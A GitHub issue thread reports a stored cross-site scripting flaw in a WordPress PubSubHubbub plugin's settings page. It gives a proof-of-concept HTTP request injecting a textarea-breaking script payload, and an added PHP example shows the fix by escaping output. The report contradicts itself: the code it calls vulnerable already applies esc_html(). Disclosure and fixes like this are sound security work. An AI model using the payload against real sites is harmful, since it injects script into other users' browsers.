pubsubhubbub / wordpress-pubsubhubbub

WebSub/PubSubHubbub for WordPress
https://wordpress.org/plugins/pubsubhubbub/
MIT License

[ Security Issue ] Authenticated stored cross-site scripting #18

Closed osamahamad closed 10 months ago

osamahamad commented 2 years ago

I found that your plugin is vulnerable to stored cross-site scripting during my security research on WordPress plugins that have more than 200,000 active installations.

I wish there were a security policy for this plugin to report it through. I didn't find another way. Note this affects the latest version, 3.1.2; I didn't check whether the others are vulnerable or not. As can be seen in templates\settings-page.php:

$pubsubhubbub_endpoints = esc_html(trim( implode( PHP_EOL, pubsubhubbub_get_hubs() ), PHP_EOL ));
<textarea name="pubsubhubbub_endpoints" id="pubsubhubbub_endpoints" rows="10" cols="50" class="large-text"><?php echo $pubsubhubbub_endpoints; ?></textarea>

pubsubhubbub_endpoints will print output unsanitized from dangerous HTML chars [ < > ]. Therefore, a malicious actor can escape </textarea> and inject malicious JavaScript code on the client side.

Proof of Concept

POST /wordpress/wp-admin/options.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/wordpress/wp-admin/options-general.php?page=pubsubhubbub
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
Origin: http://target.com
Connection: close
Cookie: wordpress_799b52315717366fca2f113600
Upgrade-Insecure-Requests: 1

option_page=pubsubhubbub&action=update&_wpnonce=0db7dd530d&_wp_http_referer=%2Fwpmf%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpubsubhubbub%26settings-updated%3Dtrue&pubsubhubbub_endpoints=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Save+Changes

Remediation

Simply escape the chars with esc_html() or something similar.

templates\settings-page.php

$pubsubhubbub_endpoints = esc_html(trim( implode( PHP_EOL, pubsubhubbub_get_hubs() ), PHP_EOL ));

That will result in

image
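To make the escaping point concrete, here is an added, stand-alone PHP example (not the plugin's own code and not part of the report). It renders the same textarea two ways, once echoing the stored option raw and once entity-encoding it first, and runs a small check that a unit test or code review could apply. Because it runs outside WordPress, the WordPress helpers esc_html()/esc_textarea() are replaced by the htmlspecialchars() call they wrap; the hub list, including the value shaped like the stored payload from the report, is constructed sample data, and the function names are the example's own.

```php
<?php
// Added example, not the pubsubhubbub plugin's code. Outside WordPress,
// esc_html()/esc_textarea() are not available, so the hardened branch uses
// htmlspecialchars() directly; inside the plugin you would call esc_textarea().

/** Constructed stand-in for pubsubhubbub_get_hubs(): one legitimate hub URL
 *  and one stored value shaped like the payload from the report. */
function sample_hubs(): array {
    return [
        'https://pubsubhubbub.appspot.com',
        '</textarea><script>alert(1)</script>',
    ];
}

/** Builds the option value the same way the template does. */
function join_hubs(array $hubs): string {
    return trim( implode( PHP_EOL, $hubs ), PHP_EOL );
}

/** Vulnerable rendering: the stored option is written into the markup raw,
 *  so a stored "</textarea>" closes the element early. */
function render_unescaped(array $hubs): string {
    $value = join_hubs( $hubs );
    return '<textarea name="pubsubhubbub_endpoints" id="pubsubhubbub_endpoints">'
        . $value . '</textarea>';
}

/** Hardened rendering: '<', '>', '&' and quotes are entity-encoded before
 *  output, which is what esc_textarea() does in WordPress, so the stored
 *  value is displayed as text and can no longer break out of the element. */
function render_escaped(array $hubs): string {
    $value = htmlspecialchars( join_hubs( $hubs ), ENT_QUOTES, 'UTF-8' );
    return '<textarea name="pubsubhubbub_endpoints" id="pubsubhubbub_endpoints">'
        . $value . '</textarea>';
}

/** Review/test check: the only closing tag in the output must be the one the
 *  template itself writes, and no script element may appear at all. */
function textarea_is_intact(string $html): bool {
    return substr_count( strtolower( $html ), '</textarea>' ) === 1
        && stripos( $html, '<script' ) === false;
}

$hubs = sample_hubs();
echo 'raw output intact:     ', var_export( textarea_is_intact( render_unescaped( $hubs ) ), true ), PHP_EOL;
echo 'escaped output intact: ', var_export( textarea_is_intact( render_escaped( $hubs ) ), true ), PHP_EOL;
echo render_escaped( $hubs ), PHP_EOL;
```

Run it with `php example.php`: the check reports false for the raw rendering (the stored value supplies a second `</textarea>` and a script element) and true for the escaped one, where the same value appears as `&lt;/textarea&gt;&lt;script&gt;...` inside the textarea. Using esc_textarea() in the plugin template gives the same result as the htmlspecialchars() call shown here, and it is the helper WordPress documents for exactly this context.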

yogeshbeniwal commented 2 years ago

@osamahamad Is Administrator privilege required to perform this?